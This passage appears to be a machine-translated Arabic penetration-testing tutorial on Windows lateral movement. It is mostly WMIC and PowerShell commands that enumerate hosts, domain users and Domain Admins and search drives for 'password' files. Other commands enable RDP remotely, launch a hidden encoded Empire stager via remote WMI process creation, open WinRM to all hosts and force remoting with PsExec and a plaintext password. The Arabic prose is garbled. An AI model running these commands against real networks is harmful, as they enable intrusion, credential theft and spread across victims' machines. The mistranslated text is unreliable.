هناك العديد من فئات ومي التي يمكن أن توفر طن من المعلومات وتساعد إلى حد كبير اختبار في أن تصبح أكثر دراية البيئة المستهدفة. في ما يلي قائمة ببعض الاستعلامات المفيدة.
Host Enumeration:
--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)
wmic computersystem LIST full
--- Anti-Virus ---
wmic /namespace:\\root\securitycenter2 path antivirusproduct
--- Peripherals ---
wmic path Win32_PnPdevice
--- Installed Updates ---
wmic gfe list brief
--- Directory Listing and File Search ---
wmic DATAFILE where "path='\\Users\\test\\Documents\\'" GET Name,readable,size
wmic DATAFILE where "drive='C:' AND Name like '%password%'" GET Name,readable,size /VALUE
--- Local User Accounts ---
wmic USERACCOUNT Get Domain,Name,Sid
Domain Enumeration:
--- Domain and DC Info ---
wmic NTDOMAIN GET DomainControllerAddress,DomainName,Roles /VALUE
--- Domain User Info ---
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='testAccount'" GET
--- List All Users ---
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname
--- List All Groups ---
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname
--- Members of A Group ---
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value
--- List All Computers ---
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname
OR
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname
Misc:
--- Execute Remote Command ---
wmic process call create "cmd.exe /c calc.exe"
--- Enable Remote Desktop ---
wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"
OR
wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"
في ما يلي قائمة بالأسماء المستعارة المفيدة لتعداد معلومات عن النظام والعملية والنطاق والمستخدمين والمجموعات:
wmic computerystem list full /format:list
wmic process list /format:list
wmic ntdomain list /format:list
wmic useraccount list /format:list
wmic group list /format:list
wmic sysaccount list /format:list
جميع الأسماء المذكورة أعلاه يمكن استخدامها عن بعد. يمكنك أيضا التفاعل مع الطبقات مباشرة مع الخيار 'المسار'. على سبيل المثال، إليك طريقة خفية جدا لاكتشاف المشرفين المحليين على جهاز بعيد (لاحظ أن هذا النطاق هو اسم الكمبيوتر)
wmic /node:ordws01 path win32_groupuser where (groupcomponent="win32_group.name=\"administrators\",domain=\"ORDWS01\"")
ملاحظة: ركضت وميك من موجه الأوامر كما جاريتا، وبالتالي لم أكن بحاجة إلى تحديد / المستخدم
ومن المفيد أنيلينر آخر هو معرفة من الذي تم تسجيل الدخول إلى جهاز (عندما كنت تصيد المشرفين):
wmic /node:ordws01 path win32_loggedonuser get antecedent
وميك حتى قراءة العقد من ملف نصي وتنفيذ الأمر على كل منهم. إذا كان لديك ملف نصي لمحطات العمل:
wmic /node:@workstations.txt path win32_loggedonuser get antecedent
لأمر بإرجاع بروسيسيد و ريتورنفالو (0 يعني أي أخطاء)
من خلال تحديد / عقدة فإنه من السهل للغاية لإنشاء العمليات عن بعد وتنفيذ الأوامر. في آخر مشاركة أثبتت إطلاق ميتربريتر من أمر إنشاء سك مع وحدة web_delivery ميتاسبلويت ل. للتبديل عنه، دعونا إطلاق عامل إمبراطورية بويرشيل هذه المرة. أولا، إنشاء سلسلة الأوامر لتنفيذ باستخدام "قاذفة" ستاجر في الإمبراطورية:
powershell.exe -NoP -sta -NonI -W Hidden -Enc JABXAEMAPQBOAEUAVwAtAE8AQgBKAGUAQw...truncated...
والآن من ويندوز، سنقوم عن بعد بإنشاء عملية على ومي لتنفيذ هذه السلسلة:
wmic /node:ordws01 /user:CSCOU\jarrieta path win32_process call create "**empire launcher string here**"
إذا كان أحد هذه المنافذ مفتوحا، يتم تكوين وينرم ويمكنك محاولة إدخال جلسة عمل عن بعد.
بدء جلسة وينرم.
لدينا أولا لتكوين آلة هجوم لدينا للعمل مع وينرم كذلك. نحن بحاجة إلى تمكينه وإضافة أي "الضحايا" كمضيفين موثوق بهم. من موجه بويرشيل مرتفع، قم بتشغيل الأمرين التاليين
Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trustedhosts *
يؤدي ذلك إلى إضافة حرف بدل إلى إعداد تروستيدوستس. كن حذرا مما يستتبعه. ملاحظة: كان لي أيضا لتغيير نوع الشبكة على جهاز الهجوم من "العامة" إلى "العمل" الشبكة. YMMV
بمجرد تكوين آلة الهجوم، استخدم الدالة تيست-وسمان لاختبار ما إذا تم تكوين الهدف ل وينرم. يجب أن ترى بعض المعلومات التي تم إرجاعها حول إصدار البروتوكول و وسميد:
الآن يمكننا استخدام بويرشيل استدعاء الأوامر لتنفيذ أمر عن بعد على الهدف عبر وينرم. لتشغيل إيبكونفيغ عن بعد ومعرفة الإخراج
Invoke-Command -Computer ordws01 -ScriptBlock {ipconfig /all} -credential CSCOU\jarrieta
أو، إذا كنت تريد إسقاط الحق في جلسة بويرشيل تفاعلية، استخدم
Enter-PSSession
جبار وينرم مفتوح. إذا كنت تريد حقا استخدام بس ريموتينغ و وينرم ولكن لم يتم تكوين الهدف لذلك، هل يمكن "فرض" على من خلال أمر واحد. أنا لا أنصح هذا ولكن إذا كنت تريد حقا لاستخدام وينرم أو بسريموتينغ من كل الوسائل تفعل ذلك بهذه الطريقة. على سبيل المثال، باستخدام بسيكسيك
\tools\SysinternalsSuite> .\PsExec.exe \\ordws04 -u cscou\jarrieta -p nastyCutt3r -h -d powershell.exe "enable-psre
moting -force"
يمكنك استبدال متغير ستربكومب $ مع أي اسم المضيف الذي يمكن الوصول إليه من قبل الجهاز بتشغيل بويرشيل، مما يجعل من السهل للحصول على قائمة من عناوين ماك من جميع أنحاء الشبكة.
يمكنك أيضا معرفة عناوين إب النشطة على شبكتك، وذلك باستخدام كمدليت بينغ بسيط يدور عبر جميع عناوين إب الممكنة على الشبكة الفرعية المحلية. سيؤدي هذا إلى عرض جدول مع عناوين إب ورموز الحالة، 0 يشير إلى أن العنوان قيد الاستخدام.
1..254| ForEach -Process {WmiObject -Class Win32_PingStatus -Filter ("Address='192.168.16." + $_ + "'") -ComputerName .} | Select-Object -Property Address, StatusCode | ft
